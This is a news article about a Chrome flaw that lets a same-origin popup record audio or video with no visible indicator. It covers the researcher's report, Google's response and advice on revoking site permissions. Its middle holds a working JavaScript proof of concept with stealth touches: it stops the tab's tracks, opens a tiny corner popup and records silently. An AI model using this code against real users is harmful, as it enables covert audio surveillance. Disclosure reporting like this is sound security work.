Ran Bar-Zik, a web developer at AOL, has discovered and reported a bug in Google Chrome that allows websites to record audio and video without showing a visual indicator.

The bug is not as bad as it sounds, as the malicious website still needs to get the user's permission to access audio and video components, but there are various ways in which this issue could be weaponized to record audio or video without the user's knowledge.

The bug's central element is a "red circle and dot" icon that Chrome usually shows when recording audio or video streams.

In a private conversation, Bar-Zik told Bleeping Computer he discovered the bug at work while dealing with a website that ran WebRTC code.

WebRTC is a set of browser APIs and protocols for streaming audio and video over the Internet in real time. Before a website can capture anything, the user must grant it permission to access the microphone and camera; in Chrome this prompt appears the first time a page calls getUserMedia.

Once a website has that permission, its JavaScript can capture the microphone and camera streams and send them to the other participants of a WebRTC session. The same streams can also be recorded locally, via the JavaScript MediaRecorder API, and saved or uploaded as a file.

Attack code is launched via a Chrome popup

Bar-Zik discovered that the code that does the recording doesn't necessarily have to run on the original tab where the permission was granted.

Because the permission to access audio and video data is granted to the whole origin rather than to one tab, the Israeli developer realized he could open a Chrome popup window (which he describes as headless, since it has no tab bar) and run the recording code there instead.

Chrome draws the red circle and dot icon in the tab strip of the window that is recording. A popup window has no tab strip, so the icon is never shown for it, even though the recording is in progress.
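The flow described above, as an added example written for this article (it is not the researcher's proof-of-concept and not Chrome code): the main page obtains the microphone grant, opens a small same-origin popup, and the popup page records without any tab strip to carry the indicator. Browser objects are passed in as parameters so the logic can also be exercised outside a browser with fakes; the page name /recorder.html, the 20-second duration and the download link are assumptions.

```javascript
// Step 1 (main tab): obtain the microphone grant. Chrome remembers the decision for the
// origin, so later getUserMedia calls from any same-origin window succeed without a prompt.
async function obtainMicGrant(nav) {
  const stream = await nav.mediaDevices.getUserMedia({ audio: true });
  // Stop the tracks at once: the grant persists, but the tab's red indicator goes away.
  stream.getTracks().forEach((t) => t.stop());
  return 'granted';
}

// Step 2 (main tab): open a small same-origin popup. The 'popup' feature (or explicit
// width/height) gives a window with no tab strip, which is where Chrome draws the icon.
// The URL is an assumed page that loads this same script.
function openRecorderPopup(win, url = '/recorder.html') {
  const features = 'popup,width=120,height=60,left=0,top=0';
  return win.open(url, 'rec', features);
}

// Step 3 (inside the popup): getUserMedia resolves silently because the origin is already
// allowed; MediaRecorder captures for `ms` milliseconds and the promise resolves with the
// recorded chunks. The timer is injectable so the function can be tested without waiting.
function recordAudio(nav, MediaRecorderCtor, ms, timer = setTimeout) {
  return nav.mediaDevices.getUserMedia({ audio: true }).then(
    (stream) =>
      new Promise((resolve) => {
        const chunks = [];
        const rec = new MediaRecorderCtor(stream);
        rec.ondataavailable = (e) => {
          if (e.data && e.data.size > 0) chunks.push(e.data);
        };
        rec.onstop = () => {
          stream.getTracks().forEach((t) => t.stop());
          resolve(chunks);
        };
        rec.start(1000); // hand back a chunk every second
        timer(() => rec.stop(), ms);
      })
  );
}

// Browser glue: the main page runs steps 1 and 2 on the first click (the prompt needs a
// user gesture to look natural); the popup, recognisable by window.opener, runs step 3 and
// offers the capture as a download, mirroring the benign demo described in the article.
if (typeof window !== 'undefined') {
  if (window.opener) {
    recordAudio(navigator, MediaRecorder, 20000).then((chunks) => {
      const blob = new Blob(chunks, { type: 'audio/webm' });
      const a = document.createElement('a');
      a.href = URL.createObjectURL(blob);
      a.download = 'capture.webm';
      a.textContent = 'download recording';
      document.body.appendChild(a);
    });
  } else {
    document.addEventListener(
      'click',
      async () => {
        await obtainMicGrant(navigator);
        openRecorderPopup(window);
      },
      { once: true }
    );
  }
}
```

The point to check for yourself is step 3: in the popup, getUserMedia does not prompt again, and while the recorder runs the main tab shows no red dot because its own tracks were stopped in step 1.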

Researcher reported issue to Google, but no urgent fix is coming

Bar-Zik told Bleeping Computer that after he had verified this issue with family members and other peers, he submitted a bug report to Google.

The bug report is available here. The report also includes a benign demo that asks the user for permission, launches a popup when the user clicks a button, records 20 seconds of audio, and provides a download link for the recorded file. The proof-of-concept code is also available for download from here.

In a response Bar-Zik received on the same day, Google declined to consider this bug a security issue.

This isn't really a security vulnerability - for example, WebRTC on a mobile device shows no indicator at all in the browser. The dot is a best-first effort that only works on desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation.

Researcher sees issue used in stealthy surveillance

Bar-Zik doesn't agree with Google's assessment. For example, the researcher argues that many people are affected by UI fatigue and tend to click on many permissions without reading what they agreed to.

Once the user has carelessly or accidentally granted a website the permission to access audio and video components, more sophisticated attacks can be carried out.

"Real attacks will not be very obvious," says Bar-Zik, comparing real world attacks with his user click-driven demo.

For example, Bar-Zik argues that an attacker could use very small popups to launch the attack code. This code can use the camera for a millisecond to take a user's picture, or for hours, recording the user's movements or nearby audio. If the user doesn't notice the popup in the taskbar, there's no visual indicator to cue him that someone is accessing his microphone or camera. One of the sneakiest scenarios would be an attacker disguising the popup as a mundane ad. If the user doesn't immediately close that popup, the attacker is left with an open surveillance channel on the user's PC.

Bar-Zik also says that an attacker doesn't necessarily need to create a website that asks for and obtains these permissions. An attacker could instead exploit cross-site scripting (XSS) flaws on legitimate websites that users have already granted access to their microphone and camera, and use those flaws to deliver the attack code, which then runs with the permissions already given to that origin.

Google isn't wrong in its assessment

Since Google didn't label this a security issue, Chrome will not receive an urgent fix.

Nonetheless, Google is also right in its decision not to treat this as a security issue: the red circle and dot icon is not shown on every platform (Google notes that mobile Chrome has no indicator at all), and the real defense against this type of attack is the permission prompt itself.

Users that want to stay safe against these types of attacks should pay close attention to the permissions they grant websites. Chrome keeps a per-site list of camera and microphone grants in its site settings (reachable via chrome://settings/content), where an earlier grant can be reviewed and revoked.